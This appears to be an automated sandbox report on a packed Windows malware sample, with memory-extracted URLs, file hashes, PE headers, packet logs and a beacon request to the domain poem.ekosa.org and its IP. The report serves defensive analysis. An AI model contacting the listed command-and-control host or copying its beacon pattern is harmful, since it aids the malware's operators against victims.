http://poem.ekosa.org/intro/info/info.asp?id=dn678BWVbU1Gf5p8.exe, 00000000.00000003.781250554.000000000168F000.00000004.00000001.sdmpfalse
  • Avira URL Cloud: safe
unknown
http://poem.ekosa.org/intro/info/info.asp?search=2tjbpK6urq6urq6uinfo.asp?id=dn678WVbU1Gf5p8.exe, 00000000.00000003.709608423.00000000016AA000.00000004.00000001.sdmpfalse
  • Avira URL Cloud: safe
unknown
http://poem.ekosa.org/intro/info/info.asp.batWVbU1Gf5p8.exe, 00000000.00000002.1002474836.0000000001231000.00000040.00020000.sdmpfalse
  • Avira URL Cloud: safe
unknown
http://poem.ekosa.org/intro/info/info.asp?id=dn678l;WVbU1Gf5p8.exe, 00000000.00000003.781250554.000000000168F000.00000004.00000001.sdmpfalse
  • Avira URL Cloud: safe
unknown
http://poem.ekosa.org/intro/info/info.asp?search=2tjbpK6urq6urq6uLWVbU1Gf5p8.exe, 00000000.00000003.781276052.00000000016C6000.00000004.00000001.sdmpfalse
  • Avira URL Cloud: safe
unknown
http://poem.ekosa.org/intro/info/info.asp?id=dn6786WVbU1Gf5p8.exe, 00000000.00000003.781250554.000000000168F000.00000004.00000001.sdmpfalse
  • Avira URL Cloud: safe
unknown
http://poem.ekosa.org/intro/info/info.asp?search=2tjbpK6urq6urq6uinfo.asp?id=dn678l;WVbU1Gf5p8.exe, 00000000.00000003.709608423.00000000016AA000.00000004.00000001.sdmpfalse
  • Avira URL Cloud: safe
unknown
http://poem.ekosa.org/intro/info/info.asp?search=2tjbpK6urq6urq6uOWVbU1Gf5p8.exe, 00000000.00000003.923239328.000000000168F000.00000004.00000001.sdmpfalse
  • Avira URL Cloud: safe
unknown
http://poem.ekosa.org/intro/info/info.asp?id=dn6780;WVbU1Gf5p8.exe, 00000000.00000003.709608423.00000000016AA000.00000004.00000001.sdmpfalse
  • Avira URL Cloud: safe
unknown
http://poem.ekosa.org/intro/info/info.asp?search=2tjbpK6urq6urq6uPWVbU1Gf5p8.exe, 00000000.00000003.915925652.00000000016C6000.00000004.00000001.sdmpfalse
  • Avira URL Cloud: safe
unknown
http://poem.ekosa.org/intro/info/info.asp?id=dn678:WVbU1Gf5p8.exe, 00000000.00000002.1002662893.000000000168F000.00000004.00000020.sdmpfalse
  • Avira URL Cloud: safe
unknown
http://poem.ekosa.org/intro/info/info.asp?id=dn678Z;qWVbU1Gf5p8.exe, 00000000.00000003.781250554.000000000168F000.00000004.00000001.sdmpfalse
  • Avira URL Cloud: safe
unknown
http://poem.ekosa.org/intro/info/info.asp?search=2tjbpK6urq6urq6uerWVbU1Gf5p8.exe, 00000000.00000003.915925652.00000000016C6000.00000004.00000001.sdmpfalse
  • Avira URL Cloud: safe
unknown
http://poem.ekosa.org/intro/info/info.asp?search=2tjbpK6urq6urq6udWVbU1Gf5p8.exe, 00000000.00000003.915925652.00000000016C6000.00000004.00000001.sdmpfalse
  • Avira URL Cloud: safe
unknown
http://poem.ekosa.org/intro/info/info.asp?id=dn678nWVbU1Gf5p8.exe, 00000000.00000003.915864738.000000000168F000.00000004.00000001.sdmpfalse
  • Avira URL Cloud: safe
unknown
http://poem.ekosa.org/intro/info/info.asp?id=dn678rWVbU1Gf5p8.exe, 00000000.00000003.781250554.000000000168F000.00000004.00000001.sdmpfalse
  • Avira URL Cloud: safe
unknown
http://poem.ekosa.org/intro/info/info.asp?search=2tjbpK6urq6urq6uinfo.asp?id=dn678H;cWVbU1Gf5p8.exe, 00000000.00000003.781250554.000000000168F000.00000004.00000001.sdmpfalse
  • Avira URL Cloud: safe
unknown
http://poem.ekosa.org/intro/info/info.asp?search=2tjbpK6urq6urq6uinfo.asp?id=dn678kWVbU1Gf5p8.exe, 00000000.00000003.709608423.00000000016AA000.00000004.00000001.sdmpfalse
  • Avira URL Cloud: safe
unknown
http://poem.ekosa.org/intro/info/info.asp?id=dn678kWVbU1Gf5p8.exe, 00000000.00000003.781250554.000000000168F000.00000004.00000001.sdmpfalse
  • Avira URL Cloud: safe
unknown
http://poem.ekosa.org/intro/info/info.asp?id=dn678jWVbU1Gf5p8.exe, 00000000.00000002.1002662893.000000000168F000.00000004.00000020.sdmpfalse
  • Avira URL Cloud: safe
unknown
http://poem.ekosa.org/intro/info/info.asp?id=dn678~;WVbU1Gf5p8.exe, 00000000.00000003.709608423.00000000016AA000.00000004.00000001.sdmpfalse
  • Avira URL Cloud: safe
unknown
http://poem.ekosa.org/intro/info/info.asp?id=dn678T;OWVbU1Gf5p8.exe, 00000000.00000003.709608423.00000000016AA000.00000004.00000001.sdmpfalse
  • Avira URL Cloud: safe
unknown
http://poem.ekosa.org/intro/info/info.asp?search=2tjbpK6urq6urq6uvWVbU1Gf5p8.exe, 00000000.00000003.915925652.00000000016C6000.00000004.00000001.sdmpfalse
  • Avira URL Cloud: safe
unknown
http://poem.ekosa.org/intro/info/info.asp?search=2tjbpK6urq6urq6uinfo.asp?id=dn678~;WVbU1Gf5p8.exe, 00000000.00000003.923239328.000000000168F000.00000004.00000001.sdmpfalse
  • Avira URL Cloud: safe
unknown
http://poem.ekosa.org/intro/info/info.aspWVbU1Gf5p8.exe, WVbU1Gf5p8.exe, 00000000.00000002.1002492548.0000000001249000.00000040.00020000.sdmpfalse
  • Avira URL Cloud: safe
unknown
http://poem.ekosa.org/intro/info/info.asp?id=dn678H;cWVbU1Gf5p8.exe, 00000000.00000003.709608423.00000000016AA000.00000004.00000001.sdmpfalse
  • Avira URL Cloud: safe
unknown
http://poem.ekosa.org/intro/info/info.asp?search=2tjbpK6urq6urq6ulWVbU1Gf5p8.exe, 00000000.00000003.709608423.00000000016AA000.00000004.00000001.sdmpfalse
    		unknown
    http://poem.ekosa.org/intro/info/info.asp?id=dn678VWVbU1Gf5p8.exe, 00000000.00000003.781250554.000000000168F000.00000004.00000001.sdmpfalse
    • Avira URL Cloud: safe
    		unknown
    http://poem.ekosa.org/intro/info/info.asp?search=2tjbpK6urq6urq6umWVbU1Gf5p8.exe, 00000000.00000003.709608423.00000000016AA000.00000004.00000001.sdmpfalse
    • Avira URL Cloud: safe
    		unknown
    http://poem.ekosa.org/intro/info/info.asp?search=2tjbpK6urq6urq6u.WVbU1Gf5p8.exe, 00000000.00000003.915925652.00000000016C6000.00000004.00000001.sdmpfalse
    • Avira URL Cloud: safe
    		unknown
    http://poem.ekosa.org/intro/info/info.asp?search=2tjbpK6urq6urq6uqWVbU1Gf5p8.exe, 00000000.00000003.709608423.00000000016AA000.00000004.00000001.sdmpfalse
    • Avira URL Cloud: safe
    		unknown
    http://poem.ekosa.org/intro/info/info.asp?search=2tjbpK6urq6urq6urmWVbU1Gf5p8.exe, 00000000.00000003.915864738.000000000168F000.00000004.00000001.sdmpfalse
    • Avira URL Cloud: safe
    		unknown
    http://poem.ekosa.org/intro/info/info.asp?search=2tjbpK6urq6urq6urWVbU1Gf5p8.exe, 00000000.00000003.709608423.00000000016AA000.00000004.00000001.sdmpfalse
    • Avira URL Cloud: safe
    		unknown
    http://poem.ekosa.org/intro/info/info.asp?search=2tjbpK6urq6urq6uDWVbU1Gf5p8.exe, 00000000.00000003.915925652.00000000016C6000.00000004.00000001.sdmpfalse
      		unknown
      http://poem.ekosa.org/intro/info/info.asp?search=2tjbpK6urq6urq6uEWVbU1Gf5p8.exe, 00000000.00000003.781250554.000000000168F000.00000004.00000001.sdmpfalse
      • Avira URL Cloud: safe
      		unknown
      http://poem.ekosa.org/intro/info/info.asp?search=2tjbpK6urq6urq6uJWVbU1Gf5p8.exe, 00000000.00000003.915925652.00000000016C6000.00000004.00000001.sdmpfalse
      • Avira URL Cloud: safe
      		unknown
      http://poem.ekosa.org/intro/info/info.asp?id=dn678FWVbU1Gf5p8.exe, 00000000.00000003.781250554.000000000168F000.00000004.00000001.sdmpfalse
      • Avira URL Cloud: safe
      		unknown

      Contacted IPs

      • No. of IPs < 25%
      • 25% < No. of IPs < 50%
      • 50% < No. of IPs < 75%
      • 75% < No. of IPs

      Public

      IPDomainCountryFlagASNASN NameMalicious
      210.116.91.80
      		unknownKorea Republic of
      		17881INETHOSTING-AS-KRInetHostingIncKRfalse

      General Information

      Joe Sandbox Version:31.0.0 Red Diamond
      Analysis ID:338142
      Start date:11.01.2021
      Start time:17:54:08
      Joe Sandbox Product:CloudBasic
      Overall analysis duration:0h 5m 38s
      Hypervisor based Inspection enabled:false
      Report type:light
      Sample file name:WVbU1Gf5p8 (renamed file extension from none to exe)
      Cookbook file name:default.jbs
      Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
      Number of analysed new started processes analysed:14
      Number of new started drivers analysed:0
      Number of existing processes analysed:0
      Number of existing drivers analysed:0
      Number of injected processes analysed:0
      Technologies:
      • HCA enabled
      • EGA enabled
      • HDC enabled
      • AMSI enabled
      Analysis Mode:default
      Analysis stop reason:Timeout
      Detection:MAL
      Classification:mal60.winEXE@1/0@1/1
      EGA Information:
      • Successful, ratio: 100%
      HDC Information:
      • Successful, ratio: 29.9% (good quality ratio 25.8%)
      • Quality average: 67.9%
      • Quality standard deviation: 33.9%
      HCA Information:Failed
      Cookbook Comments:
      • Adjust boot time
      • Enable AMSI
      Warnings:
      Show All
      • Exclude process from analysis (whitelisted): BackgroundTransferHost.exe, backgroundTaskHost.exe, svchost.exe
      • HTTP Packets have been reduced
      • TCP Packets have been reduced to 100
      • Excluded IPs from analysis (whitelisted): 104.42.151.234, 51.11.168.160, 92.122.213.194, 92.122.213.247, 20.54.26.129, 2.20.142.209, 2.20.142.210, 13.107.4.50, 51.104.144.132
      • Excluded domains from analysis (whitelisted): au.download.windowsupdate.com.edgesuite.net, arc.msn.com.nsatc.net, ris-prod.trafficmanager.net, ctldl.windowsupdate.com, c-0001.c-msedge.net, a767.dscg3.akamai.net, a1449.dscg2.akamai.net, arc.msn.com, afdap.au.au-msedge.net, ris.api.iris.microsoft.com, au.au-msedge.net, blobcollector.events.data.trafficmanager.net, audownload.windowsupdate.nsatc.net, au.c-0001.c-msedge.net, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, elasticShed.au.au-msedge.net, skypedataprdcolwus16.cloudapp.net, au-bg-shim.trafficmanager.net
      • Report size getting too big, too many NtDeviceIoControlFile calls found.
      • Report size getting too big, too many NtOpenKeyEx calls found.
      • Report size getting too big, too many NtQueryValueKey calls found.

      Simulations

      Behavior and APIs

      TimeTypeDescription
      17:54:57API Interceptor95x Sleep call for process: WVbU1Gf5p8.exe modified

      Joe Sandbox View / Context

      IPs

      No context

      Domains

      No context

      ASN

      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
      INETHOSTING-AS-KRInetHostingIncKRv-cnsamc.comGet hashmaliciousBrowse
      • 210.116.102.95

      JA3 Fingerprints

      No context

      Dropped Files

      No context

      Created / dropped Files

      No created / dropped files found

      Static File Info

      General

      File type:PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed
      Entropy (8bit):7.882358315267644
      TrID:
      • Win32 Executable (generic) a (10002005/4) 99.39%
      • UPX compressed Win32 Executable (30571/9) 0.30%
      • Win32 EXE Yoda's Crypter (26571/9) 0.26%
      • Generic Win/DOS Executable (2004/3) 0.02%
      • DOS Executable Generic (2002/1) 0.02%
      File name:WVbU1Gf5p8.exe
      File size:51000
      MD5:69f7cde70cc22aceb5dd32ff1dc3f685
      SHA1:f87ee3079aaa5230e107ff9684e7cdea2162caf6
      SHA256:625f63364312cec78a4c91abedba868d551d79185ff73e388f561017b13347f0
      SHA512:336c07df36c691ebed0e31f1487638bcfa1ed60e4c1aaf8122c26d42682c43b270439462eaa3d9c3dbdbf0399d0a2ce7383f6075a1d13462033a1062367b9f3e
      SSDEEP:1536:lL4aKdQ/4YJs343x7gpIgMSDfh+Ampoy5Snouy8s:lLSy3SexsxT/mpooKouts
      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......h$y.,E..,E..,E......&E......VE......4E......=E......1E......=E..%=..)E..,E..NE.......E......-E......-E..Rich,E..........PE..L..

      File Icon

      Icon Hash:00828e8e8686b000

      Static PE Info

      General

      Entrypoint:0x41eff0
      Entrypoint Section:UPX1
      Digitally signed:false
      Imagebase:0x400000
      Subsystem:windows gui
      Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
      DLL Characteristics:TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
      Time Stamp:0x5C503954 [Tue Jan 29 11:30:28 2019 UTC]
      TLS Callbacks:
      CLR (.Net) Version:
      OS Version Major:5
      OS Version Minor:1
      File Version Major:5
      File Version Minor:1
      Subsystem Version Major:5
      Subsystem Version Minor:1
      Import Hash:7a4f310606e49745a3cf26a768e6e489

      Entrypoint Preview

      Instruction
      pushad
      mov esi, 00414000h
      lea edi, dword ptr [esi-00013000h]
      push edi
      mov ebp, esp
      lea ebx, dword ptr [esp-00003E80h]
      xor eax, eax
      push eax
      cmp esp, ebx
      jne 00007F0870A387FDh
      inc esi
      inc esi
      push ebx
      push 0001CEEFh
      push edi
      add ebx, 04h
      push ebx
      push 0000AFE1h
      push esi
      add ebx, 04h
      push ebx
      push eax
      mov dword ptr [ebx], 00000003h
      nop
      nop
      nop
      nop
      nop
      push ebp
      push edi
      push esi
      push ebx
      sub esp, 7Ch
      mov edx, dword ptr [esp+00000090h]
      mov dword ptr [esp+74h], 00000000h
      mov byte ptr [esp+73h], 00000000h
      mov ebp, dword ptr [esp+0000009Ch]
      lea eax, dword ptr [edx+04h]
      mov dword ptr [esp+78h], eax
      mov eax, 00000001h
      movzx ecx, byte ptr [edx+02h]
      mov ebx, eax
      shl ebx, cl
      mov ecx, ebx
      dec ecx
      mov dword ptr [esp+6Ch], ecx
      movzx ecx, byte ptr [edx+01h]
      shl eax, cl
      dec eax
      mov dword ptr [esp+68h], eax
      mov eax, dword ptr [esp+000000A8h]
      movzx esi, byte ptr [edx]
      mov dword ptr [ebp+00h], 00000000h
      mov dword ptr [esp+60h], 00000000h
      mov dword ptr [eax], 00000000h
      mov eax, 00000300h
      mov dword ptr [esp+64h], esi
      mov dword ptr [esp+5Ch], 00000001h
      mov dword ptr [esp+58h], 00000001h
      mov dword ptr [esp+54h], 00000001h

      Rich Headers

      Programming Language:
      • [LNK] VS2015 build 23026
      • [RES] VS2015 build 23026
      • [IMP] VS2008 SP1 build 30729

      Data Directories

      NameVirtual AddressVirtual Size Is in Section
      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
      IMAGE_DIRECTORY_ENTRY_IMPORT0x201dc0xe8.rsrc
      IMAGE_DIRECTORY_ENTRY_RESOURCE0x200000x1dc.rsrc
      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
      IMAGE_DIRECTORY_ENTRY_BASERELOC0x202c40x1c.rsrc
      IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x1fbd80x5cUPX1
      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
      IMAGE_DIRECTORY_ENTRY_IAT0x00x0
      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

      Sections

      NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
      UPX00x10000x130000x0False0empty0.0IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ
      UPX10x140000xc0000xbe00False0.969078947368data7.95760709074IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
      .rsrc0x200000x10000x400False0.421875data3.96402926863IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ

      Resources

      NameRVASizeTypeLanguageCountry
      RT_MANIFEST0x2005c0x17dXML 1.0 document textEnglishUnited States

      Imports

      DLLImport
      KERNEL32.DLLLoadLibraryA, GetProcAddress, VirtualProtect, VirtualAlloc, VirtualFree, ExitProcess
      ADVAPI32.dllSystemFunction036

      Possible Origin

      Language of compilation systemCountry where language is spokenMap
      EnglishUnited States

      Network Behavior

      Network Port Distribution

      TCP Packets

      TimestampSource PortDest PortSource IPDest IP
      Jan 11, 2021 17:54:56.426768064 CET4975680192.168.2.4210.116.91.80
      Jan 11, 2021 17:54:56.688230038 CET8049756210.116.91.80192.168.2.4
      Jan 11, 2021 17:54:56.688385963 CET4975680192.168.2.4210.116.91.80
      Jan 11, 2021 17:54:56.689865112 CET4975680192.168.2.4210.116.91.80
      Jan 11, 2021 17:54:56.951431990 CET8049756210.116.91.80192.168.2.4
      Jan 11, 2021 17:54:56.951577902 CET4975680192.168.2.4210.116.91.80
      Jan 11, 2021 17:54:56.951904058 CET4975680192.168.2.4210.116.91.80
      Jan 11, 2021 17:54:56.959117889 CET4975880192.168.2.4210.116.91.80
      Jan 11, 2021 17:54:57.212683916 CET8049756210.116.91.80192.168.2.4
      Jan 11, 2021 17:54:57.221164942 CET8049758210.116.91.80192.168.2.4
      Jan 11, 2021 17:54:57.221637011 CET4975880192.168.2.4210.116.91.80
      Jan 11, 2021 17:54:57.222948074 CET4975880192.168.2.4210.116.91.80
      Jan 11, 2021 17:54:57.485622883 CET8049758210.116.91.80192.168.2.4
      Jan 11, 2021 17:54:57.485812902 CET4975880192.168.2.4210.116.91.80
      Jan 11, 2021 17:54:57.486080885 CET4975880192.168.2.4210.116.91.80
      Jan 11, 2021 17:54:57.494767904 CET4975980192.168.2.4210.116.91.80
      Jan 11, 2021 17:54:57.748080015 CET8049758210.116.91.80192.168.2.4
      Jan 11, 2021 17:54:57.753647089 CET8049759210.116.91.80192.168.2.4
      Jan 11, 2021 17:54:57.753793001 CET4975980192.168.2.4210.116.91.80
      Jan 11, 2021 17:54:57.754849911 CET4975980192.168.2.4210.116.91.80
      Jan 11, 2021 17:54:58.014203072 CET8049759210.116.91.80192.168.2.4
      Jan 11, 2021 17:54:58.014525890 CET4975980192.168.2.4210.116.91.80
      Jan 11, 2021 17:54:58.014581919 CET4975980192.168.2.4210.116.91.80
      Jan 11, 2021 17:54:58.138900995 CET4976180192.168.2.4210.116.91.80
      Jan 11, 2021 17:54:58.273649931 CET8049759210.116.91.80192.168.2.4
      Jan 11, 2021 17:54:58.403007030 CET8049761210.116.91.80192.168.2.4
      Jan 11, 2021 17:54:58.403090954 CET4976180192.168.2.4210.116.91.80
      Jan 11, 2021 17:54:58.403862000 CET4976180192.168.2.4210.116.91.80
      Jan 11, 2021 17:54:58.668386936 CET8049761210.116.91.80192.168.2.4
      Jan 11, 2021 17:54:58.668536901 CET4976180192.168.2.4210.116.91.80
      Jan 11, 2021 17:54:58.668831110 CET4976180192.168.2.4210.116.91.80
      Jan 11, 2021 17:54:58.675659895 CET4976280192.168.2.4210.116.91.80
      Jan 11, 2021 17:54:58.932600975 CET8049761210.116.91.80192.168.2.4
      Jan 11, 2021 17:54:58.936108112 CET8049762210.116.91.80192.168.2.4
      Jan 11, 2021 17:54:58.936343908 CET4976280192.168.2.4210.116.91.80
      Jan 11, 2021 17:54:58.937810898 CET4976280192.168.2.4210.116.91.80
      Jan 11, 2021 17:54:59.198338032 CET8049762210.116.91.80192.168.2.4
      Jan 11, 2021 17:54:59.198510885 CET4976280192.168.2.4210.116.91.80
      Jan 11, 2021 17:54:59.198682070 CET4976280192.168.2.4210.116.91.80
      Jan 11, 2021 17:54:59.221259117 CET4976380192.168.2.4210.116.91.80
      Jan 11, 2021 17:54:59.458458900 CET8049762210.116.91.80192.168.2.4
      Jan 11, 2021 17:54:59.488636971 CET8049763210.116.91.80192.168.2.4
      Jan 11, 2021 17:54:59.488924980 CET4976380192.168.2.4210.116.91.80
      Jan 11, 2021 17:54:59.492043972 CET4976380192.168.2.4210.116.91.80
      Jan 11, 2021 17:54:59.760138988 CET8049763210.116.91.80192.168.2.4
      Jan 11, 2021 17:54:59.760399103 CET4976380192.168.2.4210.116.91.80
      Jan 11, 2021 17:54:59.760581970 CET4976380192.168.2.4210.116.91.80
      Jan 11, 2021 17:54:59.872613907 CET4976580192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:00.027846098 CET8049763210.116.91.80192.168.2.4
      Jan 11, 2021 17:55:00.136830091 CET8049765210.116.91.80192.168.2.4
      Jan 11, 2021 17:55:00.137089968 CET4976580192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:00.138458967 CET4976580192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:00.403141022 CET8049765210.116.91.80192.168.2.4
      Jan 11, 2021 17:55:00.403307915 CET4976580192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:00.403438091 CET4976580192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:00.406855106 CET4976680192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:00.667313099 CET8049765210.116.91.80192.168.2.4
      Jan 11, 2021 17:55:00.676996946 CET8049766210.116.91.80192.168.2.4
      Jan 11, 2021 17:55:00.677155018 CET4976680192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:00.678997040 CET4976680192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:00.949650049 CET8049766210.116.91.80192.168.2.4
      Jan 11, 2021 17:55:00.949882030 CET4976680192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:00.950048923 CET4976680192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:00.956501961 CET4976880192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:01.219989061 CET8049766210.116.91.80192.168.2.4
      Jan 11, 2021 17:55:01.222208977 CET8049768210.116.91.80192.168.2.4
      Jan 11, 2021 17:55:01.222369909 CET4976880192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:01.223732948 CET4976880192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:01.488401890 CET8049768210.116.91.80192.168.2.4
      Jan 11, 2021 17:55:01.488492012 CET4976880192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:01.490192890 CET4976880192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:01.605155945 CET4976980192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:01.754262924 CET8049768210.116.91.80192.168.2.4
      Jan 11, 2021 17:55:01.866909981 CET8049769210.116.91.80192.168.2.4
      Jan 11, 2021 17:55:01.867063999 CET4976980192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:01.867994070 CET4976980192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:02.130270958 CET8049769210.116.91.80192.168.2.4
      Jan 11, 2021 17:55:02.130368948 CET4976980192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:02.130969048 CET4976980192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:02.135477066 CET4977180192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:02.392546892 CET8049769210.116.91.80192.168.2.4
      Jan 11, 2021 17:55:02.396588087 CET8049771210.116.91.80192.168.2.4
      Jan 11, 2021 17:55:02.396747112 CET4977180192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:02.398149014 CET4977180192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:02.659898996 CET8049771210.116.91.80192.168.2.4
      Jan 11, 2021 17:55:02.660130024 CET4977180192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:02.660479069 CET4977180192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:02.668045998 CET4977280192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:02.921279907 CET8049771210.116.91.80192.168.2.4
      Jan 11, 2021 17:55:02.929611921 CET8049772210.116.91.80192.168.2.4
      Jan 11, 2021 17:55:02.929838896 CET4977280192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:02.931457043 CET4977280192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:03.193223953 CET8049772210.116.91.80192.168.2.4
      Jan 11, 2021 17:55:03.193450928 CET4977280192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:03.193942070 CET4977280192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:03.312998056 CET4977480192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:03.455095053 CET8049772210.116.91.80192.168.2.4
      Jan 11, 2021 17:55:03.584038973 CET8049774210.116.91.80192.168.2.4
      Jan 11, 2021 17:55:03.584239006 CET4977480192.168.2.4210.116.91.80
      Jan 11, 2021 17:55:03.585913897 CET4977480192.168.2.4210.116.91.80

      UDP Packets

      TimestampSource PortDest PortSource IPDest IP
      Jan 11, 2021 17:54:50.327912092 CET5653453192.168.2.48.8.8.8
      Jan 11, 2021 17:54:50.375921965 CET53565348.8.8.8192.168.2.4
      Jan 11, 2021 17:54:51.456178904 CET5662753192.168.2.48.8.8.8
      Jan 11, 2021 17:54:51.507028103 CET53566278.8.8.8192.168.2.4
      Jan 11, 2021 17:54:52.859436989 CET5662153192.168.2.48.8.8.8
      Jan 11, 2021 17:54:52.910554886 CET53566218.8.8.8192.168.2.4
      Jan 11, 2021 17:54:54.150439978 CET6311653192.168.2.48.8.8.8
      Jan 11, 2021 17:54:54.198148012 CET53631168.8.8.8192.168.2.4
      Jan 11, 2021 17:54:55.312558889 CET6407853192.168.2.48.8.8.8
      Jan 11, 2021 17:54:55.363318920 CET53640788.8.8.8192.168.2.4
      Jan 11, 2021 17:54:56.019773960 CET6480153192.168.2.48.8.8.8
      Jan 11, 2021 17:54:56.400116920 CET53648018.8.8.8192.168.2.4
      Jan 11, 2021 17:54:56.479903936 CET6172153192.168.2.48.8.8.8
      Jan 11, 2021 17:54:56.528000116 CET53617218.8.8.8192.168.2.4
      Jan 11, 2021 17:54:57.613356113 CET5125553192.168.2.48.8.8.8
      Jan 11, 2021 17:54:57.664556980 CET53512558.8.8.8192.168.2.4
      Jan 11, 2021 17:54:59.272258043 CET6152253192.168.2.48.8.8.8
      Jan 11, 2021 17:54:59.323074102 CET53615228.8.8.8192.168.2.4
      Jan 11, 2021 17:55:00.485110044 CET5233753192.168.2.48.8.8.8
      Jan 11, 2021 17:55:00.541618109 CET53523378.8.8.8192.168.2.4
      Jan 11, 2021 17:55:01.652298927 CET5504653192.168.2.48.8.8.8
      Jan 11, 2021 17:55:01.710850000 CET53550468.8.8.8192.168.2.4
      Jan 11, 2021 17:55:02.817600012 CET4961253192.168.2.48.8.8.8
      Jan 11, 2021 17:55:02.865578890 CET53496128.8.8.8192.168.2.4
      Jan 11, 2021 17:55:03.955786943 CET4928553192.168.2.48.8.8.8
      Jan 11, 2021 17:55:04.003793955 CET53492858.8.8.8192.168.2.4
      Jan 11, 2021 17:55:05.092745066 CET5060153192.168.2.48.8.8.8
      Jan 11, 2021 17:55:05.143625975 CET53506018.8.8.8192.168.2.4
      Jan 11, 2021 17:55:14.155049086 CET6087553192.168.2.48.8.8.8
      Jan 11, 2021 17:55:14.206022978 CET53608758.8.8.8192.168.2.4
      Jan 11, 2021 17:55:18.857247114 CET5644853192.168.2.48.8.8.8
      Jan 11, 2021 17:55:18.915152073 CET53564488.8.8.8192.168.2.4
      Jan 11, 2021 17:55:30.622966051 CET5917253192.168.2.48.8.8.8
      Jan 11, 2021 17:55:30.697223902 CET53591728.8.8.8192.168.2.4
      Jan 11, 2021 17:55:40.183861971 CET6242053192.168.2.48.8.8.8
      Jan 11, 2021 17:55:40.242363930 CET53624208.8.8.8192.168.2.4
      Jan 11, 2021 17:55:40.341576099 CET6057953192.168.2.48.8.8.8
      Jan 11, 2021 17:55:40.389503956 CET53605798.8.8.8192.168.2.4
      Jan 11, 2021 17:55:49.522109032 CET5018353192.168.2.48.8.8.8
      Jan 11, 2021 17:55:49.569937944 CET53501838.8.8.8192.168.2.4
      Jan 11, 2021 17:55:50.181818008 CET6153153192.168.2.48.8.8.8
      Jan 11, 2021 17:55:50.255687952 CET53615318.8.8.8192.168.2.4
      Jan 11, 2021 17:55:52.533818007 CET4922853192.168.2.48.8.8.8
      Jan 11, 2021 17:55:52.594717979 CET53492288.8.8.8192.168.2.4
      Jan 11, 2021 17:56:24.092113018 CET5979453192.168.2.48.8.8.8
      Jan 11, 2021 17:56:24.142743111 CET53597948.8.8.8192.168.2.4
      Jan 11, 2021 17:56:25.992212057 CET5591653192.168.2.48.8.8.8
      Jan 11, 2021 17:56:26.048433065 CET53559168.8.8.8192.168.2.4

      DNS Queries

      TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
      Jan 11, 2021 17:54:56.019773960 CET192.168.2.48.8.8.80x86a6Standard query (0)poem.ekosa.orgA (IP address)IN (0x0001)

      DNS Answers

      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
      Jan 11, 2021 17:54:56.400116920 CET8.8.8.8192.168.2.40x86a6No error (0)poem.ekosa.org210.116.91.80A (IP address)IN (0x0001)

      HTTP Request Dependency Graph

      • poem.ekosa.org

      HTTP Packets

      Session IDSource IPSource PortDestination IPDestination PortProcess
      0192.168.2.449756210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData
      Jan 11, 2021 17:54:56.689865112 CET77OUTGET /intro/info/info.asp?id=dn678 HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
